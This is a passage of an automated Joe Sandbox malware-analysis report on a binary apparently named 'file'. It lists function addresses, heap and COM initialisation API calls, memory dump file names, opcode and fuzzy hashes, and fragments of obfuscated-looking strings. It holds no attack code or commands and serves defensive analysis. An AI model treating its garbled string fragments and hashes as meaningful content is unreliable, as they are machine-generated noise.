                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 573b8a95927f21c1263f8d1757fd509c13b2a5375e6ea6e712a3d2c1dcc9a8da
                                                                                              • Instruction ID: 2381ab0d5aad86872a5cb586094e6b95c707b0574dc9a3fbdef442349f557865
                                                                                              • Opcode Fuzzy Hash: 573b8a95927f21c1263f8d1757fd509c13b2a5375e6ea6e712a3d2c1dcc9a8da
                                                                                              • Instruction Fuzzy Hash: 70415C31A19344EFD3009F68EC82A5B7BE8EB8A314F04897CF549C32D1DAB8D905C792
                                                                                              Function 00B5DED0 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 658 b5ded0-b5dee3 659 b5df3e-b5df47 call b5b7e0 658->659 660 b5df49-b5df52 call b5b860 658->660 661 b5def8-b5df05 658->661 662 b5deea-b5def1 658->662 670 b5df57-b5df5a 659->670 669 b5df54 660->669 663 b5df10-b5df27 661->663 662->660 662->661 663->663 666 b5df29-b5df3c RtlReAllocateHeap 663->666 666->669 669->670
                                                                                              APIs
                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,00000000,00000000,00000001,?,00000000,00000000,00B2B5FE,00000000,00000001), ref: 00B5DF36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 0c9a09da6b354929ff652e30adbf65eb6dfc3e3e80b55b2d1024e2ef66b4e8c1
                                                                                              • Instruction ID: da2d816bae612b007e4f5da7565d8d63f27bdddcd4cd7024d3acfbe8da4f8331
                                                                                              • Opcode Fuzzy Hash: 0c9a09da6b354929ff652e30adbf65eb6dfc3e3e80b55b2d1024e2ef66b4e8c1
                                                                                              • Instruction Fuzzy Hash: 68014E769083409BD7241F24ECA2EAB7BA8DFD7355F1604FCE54797650C638584FC292
                                                                                              Function 00B5B7E0 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 671 b5b7e0-b5b7ff 672 b5b800-b5b83d 671->672 672->672 673 b5b83f-b5b85b RtlAllocateHeap 672->673
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00B5B84E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: b805c49d3ab3c63e03acfc6c8fdf865f54902607891d596de22ac751ae5cde31
                                                                                              • Instruction ID: 6b2bcb9b906cd2bd153562161bd5ec3e12acfc70159d4acc75690f510d6e25e6
                                                                                              • Opcode Fuzzy Hash: b805c49d3ab3c63e03acfc6c8fdf865f54902607891d596de22ac751ae5cde31
                                                                                              • Instruction Fuzzy Hash: 53019E33A457080BC710AF7CDCD4646BB96EFD9324F25067CE5D4873D0D931990AC295
                                                                                              Function 00B2CEB3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00B2CEC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeSecurity
                                                                                              • String ID:
                                                                                              • API String ID: 640775948-0
                                                                                              • Opcode ID: 9b4f5a7adb4b7f4dcd0282721d673f641215fc5ffabad4966aa30bafa71e9108
                                                                                              • Instruction ID: 2a9840e3f2f32800027ca8623729b47338ebac0283422357f7a9edb1eb3e3a41
                                                                                              • Opcode Fuzzy Hash: 9b4f5a7adb4b7f4dcd0282721d673f641215fc5ffabad4966aa30bafa71e9108
                                                                                              • Instruction Fuzzy Hash: 4CD0C9317D4342B6F96486089C53F1023058706F28F301A18F322FE2D1CCD171428508
                                                                                              Function 00B2CE80 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 674 b2ce80-b2ceb0 CoInitializeEx
                                                                                              APIs
                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 00B2CE94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 4ff333d84683204ef7a1f19ca8dc68967291c44c2925f6d9149e50b26f967555
                                                                                              • Instruction ID: 9c6e21252911a13806e9be1ff7998f0963eb02e1a090e7f7220c920e6bbce43d
                                                                                              • Opcode Fuzzy Hash: 4ff333d84683204ef7a1f19ca8dc68967291c44c2925f6d9149e50b26f967555
                                                                                              • Instruction Fuzzy Hash: 57D0A72139024877D114A21CEC97F27375DC702754F440636E6A2CB2D2DD9169159166

                                                                                              Non-executed Functions

                                                                                              Function 00B294D0 Relevance: 17.9, Strings: 14, Instructions: 385COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                                                                                              • API String ID: 0-1787199350
                                                                                              • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                                                                              • Instruction ID: 8814b5affab24abd56cc8af7e0f2440d0cc98a4ad3add063a6cf4b562a74603b
                                                                                              • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                                                                                              • Instruction Fuzzy Hash: FBB1D67010C3918FD3158F2990607ABBFE1EF97744F1849ACE4D98B392D779880ACB92
                                                                                              Function 00B3DB30 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 5[Y$8$CN$Lw$}~$SRQ$_]
                                                                                              • API String ID: 0-3274379026
                                                                                              • Opcode ID: 2d0964d6cc405fe2b010a5f91f55b90aa9a4d55c281ce1305551243270f44d70
                                                                                              • Instruction ID: d90b7ea148317f9cb27c7ac77eead3c19a45eac5547b9f561bfd2c5b3ce6f52a
                                                                                              • Opcode Fuzzy Hash: 2d0964d6cc405fe2b010a5f91f55b90aa9a4d55c281ce1305551243270f44d70
                                                                                              • Instruction Fuzzy Hash: 295159715283518BD320CF25C8912ABB7F2FFD2301F58999CE8C19B295EB74890AC792
                                                                                              Function 00CE6A1F Relevance: 7.9, Strings: 5, Instructions: 1611COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: --w$-:q$=j$J4io$<_s
                                                                                              • API String ID: 0-1928838462
                                                                                              • Opcode ID: 8dffabbaac12325a4554c6d4b980aa5d5362addcff39de8a6e5cac637de45456
                                                                                              • Instruction ID: 1c99453d480d33a2f6ddd66ed73353fdd047290b54f9e29ffcc909a88c0086d5
                                                                                              • Opcode Fuzzy Hash: 8dffabbaac12325a4554c6d4b980aa5d5362addcff39de8a6e5cac637de45456
                                                                                              • Instruction Fuzzy Hash: 0EB2E7F361C204AFE7046E29EC8567AFBE9EF94720F1A493DE6C4C3744E63598018697
                                                                                              Function 00CE4F3D Relevance: 7.8, Strings: 5, Instructions: 1599COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *4)k$<mz$E{U$F9Ju$/^?
                                                                                              • API String ID: 0-1182699697
                                                                                              • Opcode ID: 7683c9ce1a629fec7c82acd53f648ad3b79b20573071e34c66c5c5ce96a05a67
                                                                                              • Instruction ID: fe985cefc91c6424029cfe6707f3bbf836586c9c9dd12cc5cc5b87d4db1f4370
                                                                                              • Opcode Fuzzy Hash: 7683c9ce1a629fec7c82acd53f648ad3b79b20573071e34c66c5c5ce96a05a67
                                                                                              • Instruction Fuzzy Hash: CFB2F6F360C2049FE304AE2DEC8566ABBE5EF98720F16893DEAC4C7744E63558418797
                                                                                              Function 00CE34ED Relevance: 6.6, Strings: 4, Instructions: 1616COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !tY$;~c{$Kw?$Kw?
                                                                                              • API String ID: 0-1555395378
                                                                                              • Opcode ID: 4a66b67d616f4a521d3041a0647d650af7e0cf8ddcbd62ecdc084c9ada6833f9
                                                                                              • Instruction ID: 865803612b4f42fc3192268db7478ff8a4a68352d0db74a443a01773c6aa8934
                                                                                              • Opcode Fuzzy Hash: 4a66b67d616f4a521d3041a0647d650af7e0cf8ddcbd62ecdc084c9ada6833f9
                                                                                              • Instruction Fuzzy Hash: C7B206F3A0C2149FE304AE2DEC8567AFBE9EF94720F16493DEAC4C7744E63558008686
                                                                                              Function 00B29210 Relevance: 6.5, Strings: 5, Instructions: 269COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: )=+4$57$7514$84*6$N
                                                                                              • API String ID: 0-4020838272
                                                                                              • Opcode ID: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                                                                              • Instruction ID: f058ba5252f4523cea50e49fa0a920d69df216ba9dc185223e19425fbe8ca32b
                                                                                              • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                                                                                              • Instruction Fuzzy Hash: B971C36110C3D18BD315DB2994A037BFFE1EFA2305F18499DE4DA4B382D779890AC756
                                                                                              Function 00B40870 Relevance: 5.9, Strings: 4, Instructions: 861COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
